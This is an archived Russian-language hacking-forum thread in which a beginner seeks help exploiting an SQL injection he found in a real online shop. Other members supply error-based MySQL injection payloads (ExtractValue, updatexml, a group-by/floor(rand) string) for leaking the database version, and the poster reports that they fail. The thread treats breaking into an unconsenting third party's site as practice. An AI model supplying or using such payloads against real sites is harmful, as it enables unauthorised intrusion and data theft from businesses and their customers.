ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.08.2015, 05:07
|
|
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Здравствуйте, коллеги Вообщем недавно решил помимо разработки сайтов научиться взламывать сайты. Нарыл один интересный интернет-магазин, и сразу же нашел SQL инъекцию.
Вообщем что только не придумывал, и union прописывал и т.д.
Вылетает одна и та же хрень, ошибка синтаксиса. Инъекция работает если ставить " кавычку.
Какие еще могут быть варианты для взлома? |
|
|
26.08.2015, 06:37
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197
Репутация:
25
|
|
Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#
|
|
|
|
26.08.2015, 11:13
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065
Репутация:
0
|
|
Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
|
|
|
|
27.08.2015, 02:17
|
|
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от SaNDER
↑
Чувак я советую полностью тебе ссылку закрывать,я её через inurl нашёл .
да все равно, кто нашел, тот молодец. Сайт я взломать пытаюсь не для корыстной цели, а для практики.
----------------------------------
|
|
|
|
27.08.2015, 02:18
|
|
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Br@!ns
↑
Пробуйте error based вектор. например:
'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
или
'-updatexml(0,repeat(version(),2),2)#
Не помогло....
|
|
|
|
27.08.2015, 16:37
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
|
|
|
|
27.08.2015, 17:43
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
2065
Репутация:
0
|
|
Сообщение от yarbabin
↑
"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
Тоже не пашет .
|
|
|
|
27.08.2015, 17:45
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от yarbabin
↑
"))))||1+group+by+concat(version(),floor(rand(0)*2 ))having+min(0)%23
в ошибке увидите версию
а какого типа эта инъекция, если можно манукльчик ))
|
|
|
|
27.08.2015, 17:45
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от BabaDook
↑
а какого типа эта инъекция, если можно манукльчик ))
error based
|
|
|
|
28.08.2015, 02:22
|
|
Новичок
Регистрация: 20.08.2011
Сообщений: 0
Провел на форуме:
0
Репутация:
0
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
